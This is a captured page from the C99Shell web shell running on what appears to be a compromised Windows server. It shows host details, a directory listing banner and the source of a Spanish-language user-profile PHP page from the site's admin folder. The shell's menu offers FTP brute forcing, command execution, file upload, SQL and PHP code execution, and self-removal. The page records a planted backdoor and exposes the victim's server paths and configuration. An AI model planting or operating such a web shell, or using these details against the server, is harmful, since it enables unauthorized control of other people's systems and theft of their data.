!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\boletinlegal\admin\usuarios\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     userinfo2.php (1.64 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * UserInfo.php
 *
 * This page is for users to view their account information
 * with a link added for them to edit the information.
 *
 * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)
 * Last Updated: August 26, 2004
 */
include("include/session.php");
?>

<html>
<title></title>
<body>

<?php
/* Requested Username error checking */
$req_user trim($_GET['user']);
if(!
$req_user || strlen($req_user) == ||
   !
eregi("^([0-9a-z])+$"$req_user) ||
   !
$database->usernameTaken($req_user)){
   die(
"Usuario no registrado");
}

/* Logged in user viewing own account */
if(strcmp($session->username,$req_user) == 0){
   echo 
"<h1>Mi cuenta</h1>";
}
/* Visitor not viewing own account */
else{
   echo 
"<h1>Información Usuario</h1>";
}

/* Display requested user information */
$req_user_info $database->getUserInfo($req_user);

/* Username */
echo "<b>Usuario: ".$req_user_info['username']."</b><br>";

/* Email */
echo "<b>Correo:</b> ".$req_user_info['email']."<br>";

/**
 * Note: when you add your own fields to the users table
 * to hold more information, like homepage, location, etc.
 * they can be easily accessed by the user info array.
 *
 * $session->user_info['location']; (for logged in users)
 *
 * ..and for this page,
 *
 * $req_user_info['location']; (for any user)
 */

/* If logged in user viewing own account, give link to edit */
if(strcmp($session->username,$req_user) == 0){
   echo 
"<br><a href=\"useredit.php\">Editar Información de la cuenta</a><br>";
}

/* Link back to main */
echo "<br>Regresar a [<a href=\"index.php\">Inicio</a>]<br>";

?>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--